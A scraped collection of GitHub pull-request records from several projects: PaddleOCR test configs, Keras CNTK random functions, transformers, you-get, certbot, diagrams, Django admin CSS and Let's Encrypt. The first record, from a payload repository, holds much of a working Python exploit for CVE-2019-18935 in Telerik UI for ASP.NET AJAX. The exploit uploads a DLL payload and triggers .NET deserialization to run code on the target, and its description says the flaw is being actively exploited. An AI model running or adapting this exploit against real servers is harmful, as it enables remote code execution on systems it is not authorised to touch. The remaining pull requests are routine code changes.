'ChunkIndex': 0, + 'TotalFileSize': 1, + 'UploadID': filename_remote # Determines remote filename on disk. + } + + # Build multipart form data. + files = { + 'rauPostData': (None, raupostdata), + 'file': (filename_remote, payload, 'application/octet-stream'), + 'fileName': (None, filename_remote), + 'contentType': (None, 'application/octet-stream'), + 'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'), + 'metadata': (None, dumps(metadata)) + } + + # Send request. + print('[*] Local payload name: ', filename_local, file=stderr) + print('[*] Destination folder: ', temp_target_folder, file=stderr) + print('[*] Remote payload name:', filename_remote, file=stderr) + print(file=stderr) + send_request(files) + +def deserialize(): + + # Build rauPostData. 
+ object = { + 'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote + } + type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' + raupostdata = build_raupostdata(object, type) + + # Build multipart form data. + files = { + 'rauPostData': (None, raupostdata), # Only need this now. + '': '' # One extra input is required for the page to process the request. + } + + # Send request. + print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr) + start = time() + send_request(files) + end = time() + print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr) + +if __name__ == '__main__': + parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.') + parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln") + parser.add_argument('-v', dest='ui_version', required=True, help='software version') + parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version') + parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL') + parser.add_argument('-f', dest='folder', required=True, help='destination folder on target') + parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau') + args = parser.parse_args() + + temp_target_folder = args.folder.replace('/', '\\') + ui_version = args.ui_version + net_version = args.net_version + filename_local = args.payload + filename_remote = str(time()) + splitext(basename(filename_local))[1] + url = args.url + + upload() + + if not args.test_upload: + deserialize() +
Adding a Telerik exploit for CVE-2019-18935, which is being actively exploited wherever insecure versions of Telerik are found.
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/151
2020-01-27T15:59:55Z
2020-01-27T19:13:29Z
2020-01-27T19:13:29Z
2020-01-27T19:13:29Z
1,603
swisskyrepo/PayloadsAllTheThings
8,411
[tipc] fix some wrong data dir
diff --git a/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt b/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt index 375bd13ad6..4607b0a7f5 100644 --- a/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt +++ b/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt @@ -34,7 +34,7 @@ distill_export:null export1:null export2:null inference_dir:Student -infer_model:./inference/ch_PP-OCRv2_rec_infer/ +infer_model:./inference/ch_PP-OCRv2_rec_infer infer_export:null infer_quant:False inference:tools/infer/predict_rec.py @@ -45,7 +45,7 @@ inference:tools/infer/predict_rec.py --use_tensorrt:False|True --precision:fp32|fp16|int8 --rec_model_dir: ---image_dir:/inference/rec_inference +--image_dir:./inference/rec_inference null:null --benchmark:True null:null diff --git a/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt b/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt index 1d6198564e..6127896ae2 100644 --- a/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt +++ b/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt @@ -13,8 +13,8 @@ train_infer_img_dir:./inference/rec_inference null:null ## trainer:pact_train -norm_train:deploy/slim/quantization/quant.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o -pact_train:null +norm_train:null +pact_train:deploy/slim/quantization/quant.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o fpgm_train:null distill_train:null null:null @@ -27,14 +27,14 @@ null:null ===========================infer_params=========================== Global.save_inference_dir:./output/ Global.pretrained_model: -norm_export:deploy/slim/quantization/export_model.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o -quant_export: -fpgm_export: +norm_export:null +quant_export:deploy/slim/quantization/export_model.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o +fpgm_export: null distill_export:null export1:null export2:null inference_dir:Student -infer_model:./inference/ch_PP-OCRv2_rec_infer/ +infer_model:./inference/ch_PP-OCRv2_rec_infer infer_export:null infer_quant:True inference:tools/infer/predict_rec.py @@ -45,7 +45,7 @@ inference:tools/infer/predict_rec.py --use_tensorrt:False|True --precision:fp32|fp16|int8 --rec_model_dir: ---image_dir:/inference/rec_inference +--image_dir:./inference/rec_inference null:null --benchmark:True null:null diff --git a/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt b/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt index 977312f2a4..9a5dd76437 100644 --- a/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt +++ b/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt @@ -4,7 +4,7 @@ python:python3.7 gpu_list:0|0,1 Global.use_gpu:True|True Global.auto_cast:null -Global.epoch_num:lite_train_lite_infer=5|whole_train_whole_infer=300 +Global.epoch_num:lite_train_lite_infer=100|whole_train_whole_infer=300 Global.save_model_dir:./output/ Train.loader.batch_size_per_card:lite_train_lite_infer=2|whole_train_whole_infer=4 Global.pretrained_model:null diff --git a/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt b/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt index 7bbdd58ae1..56b9e1896c 100644 --- a/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt +++ b/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt @@ -28,7 +28,7 @@ null:null 
Global.save_inference_dir:./output/ Global.checkpoints: norm_export:null -quant_export:deploy/slim/quantization/export_model.py -ctest_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/rec_chinese_lite_train_v2.0.yml -o +quant_export:deploy/slim/quantization/export_model.py -c test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/rec_chinese_lite_train_v2.0.yml -o fpgm_export:null distill_export:null export1:null diff --git a/test_tipc/prepare.sh b/test_tipc/prepare.sh index c384c05103..71d4010f4b 100644 --- a/test_tipc/prepare.sh +++ b/test_tipc/prepare.sh @@ -103,6 +103,8 @@ elif [ ${MODE} = "lite_train_whole_infer" ];then fi elif [ ${MODE} = "whole_infer" ];then wget -nc -P ./inference https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/ch_det_data_50.tar --no-check-certificate + wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/rec_inference.tar --no-check-certificate + cd ./inference && tar xf rec_inference.tar && cd ../ if [ ${model_name} = "ch_ppocr_mobile_v2.0_det" ]; then eval_model_name="ch_ppocr_mobile_v2.0_det_train" rm -rf ./train_data/icdar2015 @@ -122,20 +124,31 @@ elif [ ${MODE} = "whole_infer" ];then cd ./inference && tar xf ch_ppocr_server_v2.0_det_infer.tar && tar xf ch_ppocr_server_v2.0_rec_infer.tar && tar xf ch_det_data_50.tar && cd ../ elif [ ${model_name} = "ch_ppocr_mobile_v2.0_rec" ]; then eval_model_name="ch_ppocr_mobile_v2.0_rec_infer" - wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/rec_inference.tar --no-check-certificate wget -nc -P ./inference https://paddleocr.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_rec_infer.tar --no-check-certificate - cd ./inference && tar xf ${eval_model_name}.tar && tar xf rec_inference.tar && cd ../ + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ elif [ ${model_name} = "ch_ppocr_server_v2.0_rec" ]; then eval_model_name="ch_ppocr_server_v2.0_rec_infer" - wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/rec_inference.tar --no-check-certificate wget -nc -P ./inference https://paddleocr.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_server_v2.0_rec_infer.tar --no-check-certificate - cd ./inference && tar xf ${eval_model_name}.tar && tar xf rec_inference.tar && cd ../ + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ + elif [ ${model_name} = "ch_ppocr_mobile_v2.0_rec_PACT" ]; then + eval_model_name="ch_PP-OCRv2_rec_slim_quant_train" + wget -nc -P ./inference https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_rec_slim_quant_train.tar --no-check-certificate + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ + elif [ ${model_name} = "ch_ppocr_mobile_v2.0_rec_FPGM" ]; then + eval_model_name="ch_PP-OCRv2_rec_train" + wget -nc -P ./inference https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_rec_train.tar --no-check-certificate + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ fi if [[ ${model_name} =~ "ch_PPOCRv2_det" ]]; then eval_model_name="ch_PP-OCRv2_det_infer" wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_det_infer.tar --no-check-certificate cd ./inference && tar xf ${eval_model_name}.tar && tar xf ch_det_data_50.tar && cd ../ fi + if [[ ${model_name} =~ "PPOCRv2_ocr_rec" ]]; then + eval_model_name="ch_PP-OCRv2_rec_infer" + wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_rec_infer.tar --no-check-certificate + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ + fi if [ ${model_name} == "en_server_pgnetA" ]; then wget -nc -P 
./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/pgnet/en_server_pgnetA.tar --no-check-certificate cd ./inference && tar xf en_server_pgnetA.tar && tar xf ch_det_data_50.tar && cd ../
Fix some wrong data dirs in `whole_infer` mode.
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/4886
2021-12-10T07:34:09Z
2021-12-13T06:58:17Z
2021-12-13T06:58:17Z
2021-12-13T06:58:17Z
2,445
PaddlePaddle/PaddleOCR
42,656
Fix most of the issues with the CNTK backend's random functions mentioned in #10594
diff --git a/keras/backend/cntk_backend.py b/keras/backend/cntk_backend.py index a738b7ec16c..c12ad502088 100644 --- a/keras/backend/cntk_backend.py +++ b/keras/backend/cntk_backend.py @@ -369,27 +369,21 @@ def constant(value, dtype=None, shape=None, name=None): def random_binomial(shape, p=0.0, dtype=None, seed=None): - # use numpy workaround now if seed is None: # ensure that randomness is conditioned by the Numpy RNG seed = np.random.randint(10e7) - np.random.seed(seed) if dtype is None: dtype = np.float32 else: dtype = _convert_string_dtype(dtype) - size = 1 for _ in shape: if _ is None: raise ValueError('CNTK Backend: randomness op with ' 'dynamic shape is not supported now. ' 'Please provide fixed dimension ' 'instead of `None`.') - size *= _ - - binomial = np.random.binomial(1, p, size).astype(dtype).reshape(shape) - return variable(value=binomial, dtype=dtype) + return C.random.bernoulli(shape=shape, dtype=dtype, mean=p, seed=seed) def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None): @@ -400,7 +394,10 @@ def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None): 'Please provide fixed dimension ' 'instead of `None`.') - return random_uniform_variable(shape, minval, maxval, dtype, seed) + if seed is None: + # ensure that randomness is conditioned by the Numpy RNG + seed = np.random.randint(10e3) + return C.random.uniform(shape=shape, dtype=dtype, low=minval, high=maxval, seed=seed) def random_uniform_variable(shape, low, high, @@ -450,13 +447,14 @@ def random_normal_variable( if name is None: name = '' - return C.parameter( + p = C.parameter( shape=shape, init=C.initializer.normal( scale=scale, seed=seed), dtype=dtype, name=name) + return variable(value=p.value + mean) def random_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None): @@ -468,8 +466,10 @@ def random_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None): 'dynamic shape is not supported now. ' 'Please provide fixed dimension ' 'instead of `None`.') - # how to apply mean and stddev - return random_normal_variable(shape=shape, mean=mean, scale=1.0, seed=seed) + if seed is None: + # ensure that randomness is conditioned by the Numpy RNG + seed = np.random.randint(10e3) + return C.random.normal(shape=shape, mean=mean, scale=stddev, seed=seed, dtype=dtype) def truncated_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None): diff --git a/tests/keras/backend/backend_test.py b/tests/keras/backend/backend_test.py index 3ad37f5bf2a..ed049d10827 100644 --- a/tests/keras/backend/backend_test.py +++ b/tests/keras/backend/backend_test.py @@ -1162,13 +1162,19 @@ def legacy_test_pool3d(self): strides=(1, 1, 1), padding='same', pool_mode='avg') def test_random_normal(self): - mean = 0. - std = 1. 
+ # test standard normal as well as a normal with a different set of parameters for k in BACKENDS: - rand = k.eval(k.random_normal((300, 200), mean=mean, stddev=std, seed=1337)) - assert rand.shape == (300, 200) - assert np.abs(np.mean(rand) - mean) < 0.015 - assert np.abs(np.std(rand) - std) < 0.015 + for mean, std in [(0., 1.), (-10., 5.)]: + rand = k.eval(k.random_normal((300, 200), mean=mean, stddev=std, seed=1337)) + assert rand.shape == (300, 200) + assert np.abs(np.mean(rand) - mean) < std * 0.015 + assert np.abs(np.std(rand) - std) < std * 0.015 + + # test that random_normal also generates different values when used within a function + r = k.random_normal((1,), mean=mean, stddev=std, seed=1337) + samples = [k.eval(r) for _ in range(60000)] + assert np.abs(np.mean(samples) - mean) < std * 0.015 + assert np.abs(np.std(samples) - std) < std * 0.015 def test_random_uniform(self): min_val = -1. @@ -1177,8 +1183,14 @@ def test_random_uniform(self): rand = k.eval(k.random_uniform((200, 100), min_val, max_val)) assert rand.shape == (200, 100) assert np.abs(np.mean(rand)) < 0.015 - assert np.max(rand) <= max_val - assert np.min(rand) >= min_val + assert max_val - 0.015 < np.max(rand) <= max_val + assert min_val + 0.015 > np.min(rand) >= min_val + + r = k.random_uniform((1,), minval=min_val, maxval=max_val) + samples = [k.eval(r) for _ in range(20000)] + assert np.abs(np.mean(samples)) < 0.015 + assert max_val - 0.015 < np.max(samples) <= max_val + assert min_val + 0.015 > np.min(samples) >= min_val def test_random_binomial(self): p = 0.5 @@ -1189,6 +1201,12 @@ def test_random_binomial(self): assert np.max(rand) == 1 assert np.min(rand) == 0 + r = k.random_binomial((1,), p) + samples = [k.eval(r) for _ in range(20000)] + assert np.abs(np.mean(samples) - p) < 0.015 + assert np.max(samples) == 1 + assert np.min(samples) == 0 + def test_truncated_normal(self): mean = 0. std = 1.
This addresses all of the issues in #10594 except for the problem with `truncated_normal`.
https://api.github.com/repos/keras-team/keras/pulls/10595
2018-07-03T19:56:18Z
2018-07-07T07:25:05Z
2018-07-07T07:25:05Z
2018-07-07T07:25:05Z
1,546
keras-team/keras
47,905
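The Keras PR above switches the CNTK backend to native random ops so that a single symbolic op yields fresh values on every evaluation, and it tightens the tests to check sample statistics against tolerances scaled by the requested standard deviation. Below is a plain-NumPy sketch of that statistical check (not the Keras backend API), mirroring the tolerance scaling used in the new tests.

```python
import numpy as np

# Repeated draws from one random source should match the requested mean/std
# within a tolerance scaled by std, as in the updated backend tests.
rng = np.random.default_rng(1337)
mean, std = -10.0, 5.0
samples = rng.normal(loc=mean, scale=std, size=60000)

assert abs(samples.mean() - mean) < std * 0.015
assert abs(samples.std() - std) < std * 0.015
print(samples.mean(), samples.std())
```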
CLI: Properly detect encoder-decoder models
diff --git a/src/transformers/commands/pt_to_tf.py b/src/transformers/commands/pt_to_tf.py index 7bc5333b109e3..bd599de4f6994 100644 --- a/src/transformers/commands/pt_to_tf.py +++ b/src/transformers/commands/pt_to_tf.py @@ -207,7 +207,7 @@ def run(self): tf_from_pt_model = tf_class.from_pretrained(self._local_dir, from_pt=True) # Extra input requirements, in addition to the input modality - if hasattr(pt_model, "encoder") and hasattr(pt_model, "decoder"): + if config.is_encoder_decoder or (hasattr(pt_model, "encoder") and hasattr(pt_model, "decoder")): decoder_input_ids = np.asarray([[1], [1]], dtype=int) * pt_model.config.decoder_start_token_id pt_input.update({"decoder_input_ids": torch.tensor(decoder_input_ids)}) tf_input.update({"decoder_input_ids": tf.convert_to_tensor(decoder_input_ids)})
# What does this PR do?

Micro-PR that does what the title says. Some models have the encoder-decoder structure nested, and we now have access to the config file.
https://api.github.com/repos/huggingface/transformers/pulls/17605
2022-06-08T12:18:58Z
2022-06-08T15:16:00Z
2022-06-08T15:16:00Z
2022-06-08T15:25:18Z
231
huggingface/transformers
12,377
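The transformers PR above prefers the config flag over duck-typing the model's attributes, since some models nest their encoder/decoder one level down. A tiny sketch with hypothetical config/model objects (not transformers' classes) showing the "flag first, attribute check as fallback" logic:

```python
# Hypothetical objects illustrating the detection logic from the PR.
class Config:
    def __init__(self, is_encoder_decoder):
        self.is_encoder_decoder = is_encoder_decoder

class NestedEncDecModel:
    # encoder/decoder live one level down, so hasattr() checks on the model miss them.
    def __init__(self):
        self.model = object()

config = Config(is_encoder_decoder=True)
pt_model = NestedEncDecModel()

needs_decoder_input_ids = config.is_encoder_decoder or (
    hasattr(pt_model, "encoder") and hasattr(pt_model, "decoder")
)
print(needs_decoder_input_ids)  # True, even though the attribute check alone would fail
```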
Add support for VK
diff --git a/README.md b/README.md index 996d8390e5..5aac180ad2 100644 --- a/README.md +++ b/README.md @@ -60,6 +60,7 @@ __中文说明__已移至[wiki](https://github.com/soimort/you-get/wiki/%E4%B8%A * Baidu Wangpan (百度网盘) <http://pan.baidu.com> * SongTaste <http://www.songtaste.com> * Alive.in.th <http://alive.in.th> +* VK <http://vk.com> ## Dependencies diff --git a/README.txt b/README.txt index a2f17c2d1a..c4275cad77 100644 --- a/README.txt +++ b/README.txt @@ -63,6 +63,7 @@ Supported Sites (As of Now) * Baidu Wangpan (百度网盘) http://pan.baidu.com * SongTaste http://www.songtaste.com * Alive.in.th http://alive.in.th +* VK http://vk.com Dependencies ------------ diff --git a/src/you_get/extractor/__init__.py b/src/you_get/extractor/__init__.py index 5f084d4d78..018cf07214 100644 --- a/src/you_get/extractor/__init__.py +++ b/src/you_get/extractor/__init__.py @@ -37,6 +37,7 @@ from .vid48 import * from .vimeo import * from .vine import * +from .vk import * from .w56 import * from .xiami import * from .yinyuetai import * diff --git a/src/you_get/extractor/__main__.py b/src/you_get/extractor/__main__.py index 744a064666..0cb5fe93f3 100644 --- a/src/you_get/extractor/__main__.py +++ b/src/you_get/extractor/__main__.py @@ -58,6 +58,7 @@ def url_to_module(url): 'vid48': vid48, 'vimeo': vimeo, 'vine': vine, + 'vk': vk, 'xiami': xiami, 'yinyuetai': yinyuetai, 'youku': youku, diff --git a/src/you_get/extractor/vk.py b/src/you_get/extractor/vk.py new file mode 100644 index 0000000000..6bb8b39a9e --- /dev/null +++ b/src/you_get/extractor/vk.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +__all__ = ['vk_download'] + +from ..common import * + +def vk_download(url, output_dir='.', merge=True, info_only=False): + video_page = get_content(url) + title = unescape_html(r1(r'"title":"([^"]+)"', video_page)) + info = dict(re.findall(r'\\"url(\d+)\\":\\"([^"]+)\\"', video_page)) + for quality in ['1080', '720', '480', '360', '240']: + if quality in info: + url = re.sub(r'\\\\\\/', r'/', info[quality]) + break + assert url + + type, ext, size = url_info(url) + + print_info(site_info, title, type, size) + if not info_only: + download_urls([url], title, ext, size, output_dir, merge=merge) + +site_info = "VK.com" +download = vk_download +download_playlist = playlist_not_supported('vk')
**VK** (https://vk.com) is the largest European social network, with more than 100 million active users.

Test links:
- http://vk.com/video-6318641_167337138
https://api.github.com/repos/soimort/you-get/pulls/300
2014-02-18T20:18:10Z
2014-02-18T20:21:17Z
2014-02-18T20:21:17Z
2014-06-23T19:14:58Z
834
soimort/you-get
21,374
Fix minor certbot-auto verbosity issue
diff --git a/letsencrypt-auto-source/letsencrypt-auto b/letsencrypt-auto-source/letsencrypt-auto index db01277dc41..50c80f0a4d0 100755 --- a/letsencrypt-auto-source/letsencrypt-auto +++ b/letsencrypt-auto-source/letsencrypt-auto @@ -1069,8 +1069,8 @@ UNLIKELY_EOF fi if [ -n "$SUDO" ]; then # SUDO is su wrapper or sudo - echo "Requesting root privileges to run certbot..." - echo " $VENV_BIN/letsencrypt" "$@" + say "Requesting root privileges to run certbot..." + say " $VENV_BIN/letsencrypt" "$@" fi if [ -z "$SUDO_ENV" ] ; then # SUDO is su wrapper / noop diff --git a/letsencrypt-auto-source/letsencrypt-auto.template b/letsencrypt-auto-source/letsencrypt-auto.template index 566f7930731..f6585a37881 100755 --- a/letsencrypt-auto-source/letsencrypt-auto.template +++ b/letsencrypt-auto-source/letsencrypt-auto.template @@ -368,8 +368,8 @@ UNLIKELY_EOF fi if [ -n "$SUDO" ]; then # SUDO is su wrapper or sudo - echo "Requesting root privileges to run certbot..." - echo " $VENV_BIN/letsencrypt" "$@" + say "Requesting root privileges to run certbot..." + say " $VENV_BIN/letsencrypt" "$@" fi if [ -z "$SUDO_ENV" ] ; then # SUDO is su wrapper / noop
[My comment](https://github.com/certbot/certbot/pull/4292#discussion_r112085601) on #4292 caused this. These lines were previously conditional on `if [ "$QUIET" = 1 ]` and my comment caused this behavior to be removed. This PR just fixes that rather than having the PR author have to change things back due to my mistake.
https://api.github.com/repos/certbot/certbot/pulls/4530
2017-04-19T16:23:02Z
2017-04-19T21:11:19Z
2017-04-19T21:11:19Z
2017-04-19T21:11:21Z
385
certbot/certbot
3,641
Add: container runtimes
diff --git a/diagrams/onprem/container.py b/diagrams/onprem/container.py index de0494215..b60e4ac83 100644 --- a/diagrams/onprem/container.py +++ b/diagrams/onprem/container.py @@ -8,10 +8,26 @@ class _Container(_OnPrem): _icon_dir = "resources/onprem/container" +class Containerd(_Container): + _icon = "containerd.png" + + +class Crio(_Container): + _icon = "crio.png" + + class Docker(_Container): _icon = "docker.png" +class Firecracker(_Container): + _icon = "firecracker.png" + + +class Gvisor(_Container): + _icon = "gvisor.png" + + class Lxc(_Container): _icon = "lxc.png" diff --git a/docs/nodes/onprem.md b/docs/nodes/onprem.md index a519be55e..03c083f8d 100644 --- a/docs/nodes/onprem.md +++ b/docs/nodes/onprem.md @@ -55,7 +55,11 @@ Node classes list of onprem provider. ## onprem.container +- **diagrams.onprem.container.Containerd** +- **diagrams.onprem.container.Crio** - **diagrams.onprem.container.Docker** +- **diagrams.onprem.container.Firecracker** +- **diagrams.onprem.container.Gvisor** - **diagrams.onprem.container.Lxc**, **LXC** (alias) - **diagrams.onprem.container.Rkt**, **RKT** (alias) diff --git a/resources/onprem/container/containerd.png b/resources/onprem/container/containerd.png new file mode 100644 index 000000000..40032b6d3 Binary files /dev/null and b/resources/onprem/container/containerd.png differ diff --git a/resources/onprem/container/crio.png b/resources/onprem/container/crio.png new file mode 100644 index 000000000..dab25ba13 Binary files /dev/null and b/resources/onprem/container/crio.png differ diff --git a/resources/onprem/container/firecracker.png b/resources/onprem/container/firecracker.png new file mode 100644 index 000000000..522ffa3e2 Binary files /dev/null and b/resources/onprem/container/firecracker.png differ diff --git a/resources/onprem/container/gvisor.png b/resources/onprem/container/gvisor.png new file mode 100644 index 000000000..258ce7a1c Binary files /dev/null and b/resources/onprem/container/gvisor.png differ
For:

- https://containerd.io/
- https://cri-o.io/
- https://gvisor.dev/
- https://firecracker-microvm.github.io/
https://api.github.com/repos/mingrammer/diagrams/pulls/300
2020-09-27T16:06:12Z
2020-10-24T14:10:45Z
2020-10-24T14:10:45Z
2020-10-24T14:10:45Z
615
mingrammer/diagrams
52,597
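The diagrams PR above registers the new runtime classes under `diagrams.onprem.container`, so they can be used like any other node. A short usage sketch (standard diagrams usage; the diagram title, labels, and layout are arbitrary, and Graphviz must be installed):

```python
# Usage sketch for the newly added container-runtime nodes.
from diagrams import Diagram
from diagrams.onprem.container import Containerd, Crio, Firecracker, Gvisor

with Diagram("Container runtimes", show=False):
    # >> draws an edge between nodes; the grouping here is illustrative only.
    Containerd("containerd") >> Gvisor("gVisor")
    Crio("CRI-O") >> Firecracker("Firecracker")
```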
Used CSS flex for form rows.
diff --git a/django/contrib/admin/static/admin/css/forms.css b/django/contrib/admin/static/admin/css/forms.css index a326b3baf7c3f..d932556ade7b3 100644 --- a/django/contrib/admin/static/admin/css/forms.css +++ b/django/contrib/admin/static/admin/css/forms.css @@ -22,6 +22,11 @@ form .form-row p { padding-left: 0; } +.form-row > div { + display: flex; + flex-wrap: wrap; +} + /* FORM LABELS */ label { @@ -69,7 +74,6 @@ form ul.inline li { .aligned label { display: block; padding: 4px 10px 0 0; - float: left; width: 160px; word-wrap: break-word; line-height: 1; @@ -82,7 +86,7 @@ form ul.inline li { height: 26px; } -.aligned label + p, .aligned label + div.help, .aligned label + div.readonly { +.aligned label + p, .aligned .checkbox-row + div.help, .aligned label + div.readonly { padding: 6px 0; margin-top: 0; margin-bottom: 0; @@ -90,6 +94,11 @@ form ul.inline li { overflow-wrap: break-word; } +.aligned label + div.readonly, +.aligned label + .datetime { + margin-left: 0; +} + .aligned ul label { display: inline; float: none; @@ -117,7 +126,6 @@ form .aligned div.radiolist { form .aligned p.help, form .aligned div.help { - clear: left; margin-top: 0; margin-left: 160px; padding-left: 10px; @@ -129,8 +137,7 @@ form .aligned p.datetime div.help.timezonewarning { font-weight: normal; } -form .aligned label + p.help, -form .aligned label + div.help { +form .aligned .checkbox-row + .help { margin-left: 0; padding-left: 0; } diff --git a/django/contrib/admin/static/admin/css/rtl.css b/django/contrib/admin/static/admin/css/rtl.css index 014fd1e591194..9e9cffe31af5b 100644 --- a/django/contrib/admin/static/admin/css/rtl.css +++ b/django/contrib/admin/static/admin/css/rtl.css @@ -111,7 +111,6 @@ thead th.sorted .text { .aligned label { padding: 0 0 3px 1em; - float: right; } .submit-row a.deletelink { @@ -127,10 +126,6 @@ thead th.sorted .text { margin-left: 5px; } -form .aligned p.help, form .aligned div.help { - clear: right; -} - form .aligned ul { margin-right: 163px; margin-left: 0; @@ -142,6 +137,17 @@ form ul.inline li { padding-left: 7px; } +form .aligned p.help, +form .aligned div.help { + margin-right: 160px; + padding-right: 10px; +} + +form .aligned .checkbox-row + .help { + margin-right: 0; + padding-right: 0; +} + .submit-row { text-align: right; } diff --git a/django/contrib/admin/templates/admin/includes/fieldset.html b/django/contrib/admin/templates/admin/includes/fieldset.html index ba260a36ce68f..7b6e903ec319d 100644 --- a/django/contrib/admin/templates/admin/includes/fieldset.html +++ b/django/contrib/admin/templates/admin/includes/fieldset.html @@ -19,12 +19,12 @@ {{ field.field }} {% endif %} {% endif %} - {% if field.field.help_text %} - <div class="help"{% if field.field.id_for_label %} id="{{ field.field.id_for_label }}_helptext"{% endif %}> - {{ field.field.help_text|safe }} - </div> - {% endif %} </div> + {% if field.field.help_text %} + <div class="help"{% if field.field.id_for_label %} id="{{ field.field.id_for_label }}_helptext"{% endif %}> + {{ field.field.help_text|safe }} + </div> + {% endif %} {% endfor %} </div> {% endfor %}
The original idea was just to change the form rows to CSS flex, but in doing so I realised the original (before this patch) RTL pages looked wrong; with flex this was fixed, so I added a bit to the RTL sheet to align things the same way we do for LTR. I'm not an RTL expert, so it's possible it was this way intentionally. See the screenshots. It could also be that this PR is fixing two issues, but I don't see a clean way to do them separately. Before (LTR): <img width="1061" alt="Screenshot 2022-10-09 at 12 43 05" src="https://user-images.githubusercontent.com/3871354/194752937-1d7a3e4d-1315-4fe1-84bf-6d20dea0a8a7.png"> After (LTR): <img width="1111" alt="Screenshot 2022-10-09 at 12 50 19" src="https://user-images.githubusercontent.com/3871354/194752946-2aa3d756-9bee-4fe5-9f5a-fb1da2e79907.png"> Before (RTL, note labels on the left): <img width="1375" alt="Screenshot 2022-10-09 at 12 43 32" src="https://user-images.githubusercontent.com/3871354/194752955-0c3995cb-12e6-492c-a910-5556c0023dc3.png"> After (RTL, note labels on the right and help text aligned): <img width="1026" alt="Screenshot 2022-10-09 at 12 50 47" src="https://user-images.githubusercontent.com/3871354/194752983-e7e4ca0e-2523-4024-8f66-0dd4c06019ae.png">
https://api.github.com/repos/django/django/pulls/16161
2022-10-09T10:58:26Z
2022-11-22T08:17:33Z
2022-11-22T08:17:32Z
2023-03-28T23:59:14Z
1,028
django/django
51,241
allow users to choose how many config changes are shown
diff --git a/letsencrypt/cli.py b/letsencrypt/cli.py index 855c7a467c5..0422a8c6c4b 100644 --- a/letsencrypt/cli.py +++ b/letsencrypt/cli.py @@ -1059,7 +1059,7 @@ def config_changes(config, unused_plugins): View checkpoints and associated configuration changes. """ - client.view_config_changes(config) + client.view_config_changes(config, num=config.num) def plugins_cmd(config, plugins): # TODO: Use IDisplay rather than print @@ -1633,6 +1633,10 @@ def _create_subparsers(helpful): helpful.add_group("revoke", description="Options for revocation of certs") helpful.add_group("rollback", description="Options for reverting config changes") helpful.add_group("plugins", description="Plugin options") + helpful.add_group("config_changes", + description="Options for showing a history of config changes") + helpful.add("config_changes", "--num", type=int, + help="How many past revisions you want to be displayed") helpful.add( None, "--user-agent", default=None, help="Set a custom user agent string for the client. User agent strings allow " diff --git a/letsencrypt/client.py b/letsencrypt/client.py index 9dfa70e8d9f..149fdbbe9ce 100644 --- a/letsencrypt/client.py +++ b/letsencrypt/client.py @@ -543,7 +543,7 @@ def rollback(default_installer, checkpoints, config, plugins): installer.restart() -def view_config_changes(config): +def view_config_changes(config, num=None): """View checkpoints and associated configuration changes. .. note:: This assumes that the installation is using a 